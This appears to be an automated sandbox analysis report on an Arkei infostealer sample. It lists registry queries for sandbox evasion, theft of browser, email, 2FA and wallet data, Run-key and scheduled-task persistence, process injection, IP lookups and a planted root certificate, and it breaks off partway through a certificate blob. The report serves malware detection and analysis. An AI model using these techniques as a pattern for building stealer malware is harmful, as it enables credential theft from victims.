arkei | ef4c3b30be6653acf3ef81ecf835b5eaea7307d528197716d2c54db7a02ec416

System Information Discovery

Processes:

_C0eL_BNmMz7XuKXafyT9KYt.exes2lcELj867qKZLN9NW9aVgla.exeTe2BnXqb0WkJR803Y7RqUUxh.exeInstall.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	_C0eL_BNmMz7XuKXafyT9KYt.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	_C0eL_BNmMz7XuKXafyT9KYt.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	s2lcELj867qKZLN9NW9aVgla.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	s2lcELj867qKZLN9NW9aVgla.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Te2BnXqb0WkJR803Y7RqUUxh.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Te2BnXqb0WkJR803Y7RqUUxh.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe

Checks computer location settings 2 TTPs 11 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

Processes:

build.exeXtwIrs9VnN0GLedi7ioKgsZz.exeeBwDlCxU_W627VmAkEIkVTnY.exerL8zVE7YwtDWpvGfFMtZ9erB.exeLG5yi198T0Dq20rW9f_qRVJ8.exedH4pVYzAWP2X8NCSEdV6ffFH.exeInstall.exe1pTBWPkfr7lqlST6OW1pQfdc.exeef4c3b30be6653acf3ef81ecf835b5eaea7307d528197716d2c54db7a02ec416.exesotema_1.exesotema_6.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation	build.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation	XtwIrs9VnN0GLedi7ioKgsZz.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation	eBwDlCxU_W627VmAkEIkVTnY.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation	rL8zVE7YwtDWpvGfFMtZ9erB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation	LG5yi198T0Dq20rW9f_qRVJ8.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation	dH4pVYzAWP2X8NCSEdV6ffFH.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation	Install.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation	1pTBWPkfr7lqlST6OW1pQfdc.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation	ef4c3b30be6653acf3ef81ecf835b5eaea7307d528197716d2c54db7a02ec416.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation	sotema_1.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation	sotema_6.exe

Loads dropped DLL 42 IoCs

Processes:

setup_install.exesotema_9.tmprUNdlL32.eXeyl63TlwMGTanX9wwTFJ81hcg.exesotema_2.exeWerFault.exeConhost.exedada.exeAppLaunch.exe

pid	process
2212	setup_install.exe
2212	setup_install.exe
2212	setup_install.exe
2212	setup_install.exe
2212	setup_install.exe
2112	sotema_9.tmp
1260	rUNdlL32.eXe
4280	yl63TlwMGTanX9wwTFJ81hcg.exe
4280	yl63TlwMGTanX9wwTFJ81hcg.exe
4280	yl63TlwMGTanX9wwTFJ81hcg.exe
4280	yl63TlwMGTanX9wwTFJ81hcg.exe
3608	sotema_2.exe
4280	yl63TlwMGTanX9wwTFJ81hcg.exe
4280	yl63TlwMGTanX9wwTFJ81hcg.exe
4280	yl63TlwMGTanX9wwTFJ81hcg.exe
4280	yl63TlwMGTanX9wwTFJ81hcg.exe
4280	yl63TlwMGTanX9wwTFJ81hcg.exe
4280	yl63TlwMGTanX9wwTFJ81hcg.exe
4288	WerFault.exe
4288	WerFault.exe
4288	WerFault.exe
4288	WerFault.exe
4288	WerFault.exe
4288	WerFault.exe
4288	WerFault.exe
4288	WerFault.exe
4288	WerFault.exe
4288	WerFault.exe
3164	Conhost.exe
3164	Conhost.exe
4400	dada.exe
4400	dada.exe
4400	dada.exe
4400	dada.exe
4400	dada.exe
4400	dada.exe
4400	dada.exe
4400	dada.exe
4400	dada.exe
4400	dada.exe
4380	AppLaunch.exe
4380	AppLaunch.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

Processes:

LG5yi198T0Dq20rW9f_qRVJ8.exe1pTBWPkfr7lqlST6OW1pQfdc.exeMsisa.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\dada = "C:\\Users\\Admin\\Documents\\LG5yi198T0Dq20rW9f_qRVJ8.exe"	LG5yi198T0Dq20rW9f_qRVJ8.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Mzqdjnr = "\"C:\\Users\\Admin\\AppData\\Roaming\\Lmeurft\\Mzqdjnr.exe\""	1pTBWPkfr7lqlST6OW1pQfdc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe"	Msisa.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 3 IoCs

evasion trojan

System Information Discovery

Processes:

Te2BnXqb0WkJR803Y7RqUUxh.exe_C0eL_BNmMz7XuKXafyT9KYt.exes2lcELj867qKZLN9NW9aVgla.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Te2BnXqb0WkJR803Y7RqUUxh.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	_C0eL_BNmMz7XuKXafyT9KYt.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	s2lcELj867qKZLN9NW9aVgla.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 6 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

27 ipinfo.io
155 ipinfo.io
157 ipinfo.io
186 ipinfo.io
19 ip-api.com
26 ipinfo.io
Drops file in System32 directory 1 IoCs

Processes:

Install.exe

description ioc process

File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

timeout.exe

pid process

4332 timeout.exe

flow	ioc
27	ipinfo.io
155	ipinfo.io
157	ipinfo.io
186	ipinfo.io
19	ip-api.com
26	ipinfo.io

description	ioc	process
File created	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe

Suspicious use of SetThreadContext 12 IoCs

Processes:

sotema_8.exe18572cc0-8686-4186-ba71-eaa50e3961fc.exe_C0eL_BNmMz7XuKXafyT9KYt.exeWerFault.exeTe2BnXqb0WkJR803Y7RqUUxh.exes2lcELj867qKZLN9NW9aVgla.exeXf17AV2e_ecudY2tzrMhCwVx.exe1pTBWPkfr7lqlST6OW1pQfdc.exeMsisa.exe

description	pid	process	target process
PID 116 set thread context of 2736	116	sotema_8.exe	sotema_8.exe
PID 4320 set thread context of 824	4320	18572cc0-8686-4186-ba71-eaa50e3961fc.exe	MSBuild.exe
PID 1720 set thread context of 4380	1720	_C0eL_BNmMz7XuKXafyT9KYt.exe	AppLaunch.exe
PID 1880 set thread context of 3732	1880	WerFault.exe	Xd7n95TtqtWnH3UnglLX08Tk.exe
PID 4312 set thread context of 4436	4312	Te2BnXqb0WkJR803Y7RqUUxh.exe	AppLaunch.exe
PID 4360 set thread context of 2408	4360	s2lcELj867qKZLN9NW9aVgla.exe	AppLaunch.exe
PID 2464 set thread context of 4492	2464		cmd.exe
PID 4668 set thread context of 5000	4668	Xf17AV2e_ecudY2tzrMhCwVx.exe	rundll32.exe
PID 4772 set thread context of 1520	4772	1pTBWPkfr7lqlST6OW1pQfdc.exe	MSBuild.exe
PID 5072 set thread context of 2256	5072	Msisa.exe	bfsvc.exe
PID 5072 set thread context of 3752	5072	Msisa.exe	notepad.exe
PID 5072 set thread context of 3980	5072	Msisa.exe	explorer.exe

Drops file in Windows directory 1 IoCs

Processes:

schtasks.exe

description ioc process

File created C:\Windows\Tasks\booXbIzkEgfNdKvxAC.job schtasks.exe
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

description	ioc	process
File created	C:\Windows\Tasks\booXbIzkEgfNdKvxAC.job	schtasks.exe

Program crash 27 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
4000	1260	WerFault.exe	rUNdlL32.eXe
5060	4104	WerFault.exe	w2lXjkfBc5SFinec6cMspery.exe
4972	4404	WerFault.exe	fkKP3i9Y5AaeQBnP0Ggv_a61.exe
4324	4152	WerFault.exe	XtwIrs9VnN0GLedi7ioKgsZz.exe
2940	4272	WerFault.exe	mgXg7Ro8FKKV4bTcpmQEEaTw.exe
4400	4104	WerFault.exe	w2lXjkfBc5SFinec6cMspery.exe
3788	4272	WerFault.exe	mgXg7Ro8FKKV4bTcpmQEEaTw.exe
2124	4404	WerFault.exe	fkKP3i9Y5AaeQBnP0Ggv_a61.exe
4432	4668	WerFault.exe	Xf17AV2e_ecudY2tzrMhCwVx.exe
3044	4152	WerFault.exe	XtwIrs9VnN0GLedi7ioKgsZz.exe
4676	4112	WerFault.exe	FyT3wXlJWIS338nwzW0Apccb.exe
4176	4152	WerFault.exe	XtwIrs9VnN0GLedi7ioKgsZz.exe
996	4340	WerFault.exe	dH4pVYzAWP2X8NCSEdV6ffFH.exe
4288	4152	WerFault.exe	XtwIrs9VnN0GLedi7ioKgsZz.exe
5008	2120	WerFault.exe	sotema_3.exe
1860	4152	WerFault.exe	XtwIrs9VnN0GLedi7ioKgsZz.exe
3748	2464	WerFault.exe	yqwxfxyn.exe
2128	4152	WerFault.exe	XtwIrs9VnN0GLedi7ioKgsZz.exe
4540	4152	WerFault.exe	XtwIrs9VnN0GLedi7ioKgsZz.exe
3520	4152	WerFault.exe	XtwIrs9VnN0GLedi7ioKgsZz.exe
4132	4152	WerFault.exe	XtwIrs9VnN0GLedi7ioKgsZz.exe
2264	4668	WerFault.exe	Xf17AV2e_ecudY2tzrMhCwVx.exe
4840	4668	WerFault.exe	Xf17AV2e_ecudY2tzrMhCwVx.exe
1860	4668	WerFault.exe	Xf17AV2e_ecudY2tzrMhCwVx.exe
4704	4668	WerFault.exe	Xf17AV2e_ecudY2tzrMhCwVx.exe
4216	3980	WerFault.exe	explorer.exe
4408	3752	WerFault.exe	notepad.exe

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

sotema_2.exeLxjwaytgkwrfchptbandzip.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	sotema_2.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	sotema_2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	sotema_2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Lxjwaytgkwrfchptbandzip.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Lxjwaytgkwrfchptbandzip.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Lxjwaytgkwrfchptbandzip.exe

Checks processor information in registry 2 TTPs 51 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

Xf17AV2e_ecudY2tzrMhCwVx.exedada.exe18572cc0-8686-4186-ba71-eaa50e3961fc.exeAppLaunch.exeyl63TlwMGTanX9wwTFJ81hcg.exerundll32.exeWerFault.exeConhost.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data	Xf17AV2e_ecudY2tzrMhCwVx.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	Xf17AV2e_ecudY2tzrMhCwVx.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	dada.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	18572cc0-8686-4186-ba71-eaa50e3961fc.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Component Information	Xf17AV2e_ecudY2tzrMhCwVx.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Xf17AV2e_ecudY2tzrMhCwVx.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet	Xf17AV2e_ecudY2tzrMhCwVx.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	AppLaunch.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	yl63TlwMGTanX9wwTFJ81hcg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Xf17AV2e_ecudY2tzrMhCwVx.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	Xf17AV2e_ecudY2tzrMhCwVx.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	Xf17AV2e_ecudY2tzrMhCwVx.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\VendorIdentifier	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	18572cc0-8686-4186-ba71-eaa50e3961fc.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Previous Update Revision	Xf17AV2e_ecudY2tzrMhCwVx.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	Xf17AV2e_ecudY2tzrMhCwVx.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Identifier	Xf17AV2e_ecudY2tzrMhCwVx.exe
Key value enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	rundll32.exe
Key enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor	rundll32.exe
Key value enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Conhost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet	rundll32.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor	Xf17AV2e_ecudY2tzrMhCwVx.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Status	Xf17AV2e_ecudY2tzrMhCwVx.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Previous Update Revision	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Status	rundll32.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	WerFault.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Conhost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	dada.exe
Key enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor	Xf17AV2e_ecudY2tzrMhCwVx.exe
Key value enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	Xf17AV2e_ecudY2tzrMhCwVx.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	Xf17AV2e_ecudY2tzrMhCwVx.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Configuration Data	Xf17AV2e_ecudY2tzrMhCwVx.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	yl63TlwMGTanX9wwTFJ81hcg.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\VendorIdentifier	Xf17AV2e_ecudY2tzrMhCwVx.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Status	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information	rundll32.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AppLaunch.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Status	Xf17AV2e_ecudY2tzrMhCwVx.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\FeatureSet	Xf17AV2e_ecudY2tzrMhCwVx.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	rundll32.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor	rundll32.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Revision	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	rundll32.exe
Key value enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Xf17AV2e_ecudY2tzrMhCwVx.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Identifier	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	rundll32.exe

Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exe

pid process

4220 schtasks.exe
2060 schtasks.exe
3520 schtasks.exe
Delays execution with timeout.exe 2 IoCs
evasion

Processes:

timeout.exetimeout.exe

pid process

5032 timeout.exe
4332 timeout.exe
Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exe

pid process

4500 tasklist.exe
3324 tasklist.exe

pid	process
4220	schtasks.exe
2060	schtasks.exe
3520	schtasks.exe

pid	process
5032	timeout.exe
4332	timeout.exe

pid	process
4500	tasklist.exe
3324	tasklist.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

System Information Discovery

Processes:

Install.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

3860 taskkill.exe
1700 taskkill.exe

pid	process
3860	taskkill.exe
1700	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 4 IoCs

adware spyware

Modify Registry

Processes:

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Toolbar
Set value (int)	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1"
Key created	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser
Set value (data)	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000

Modifies registry class 20 IoCs

Processes:

sotema_1.exerundll32.exe

description	ioc	process
Set value (data)	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202
Set value (int)	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\NodeSlot = "2"
Key created	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	sotema_1.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff
Set value (data)	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff
Set value (data)	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 = 19002f433a5c000000000000000000000000000000000000000000
Set value (data)	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\MRUListEx = ffffffff
Key created	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU
Key created	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0
Set value (data)	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 00000000ffffffff
Key created	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell
Key created	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags
Key created	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2
Set value (str)	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Generic"
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\
Key created	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000_Classes\Local Settings	rundll32.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02
Set value (data)	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 = 14001f50e04fd020ea3a6910a2d808002b30309d0000
Key created	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

Processes:

sotema_3.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	sotema_3.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c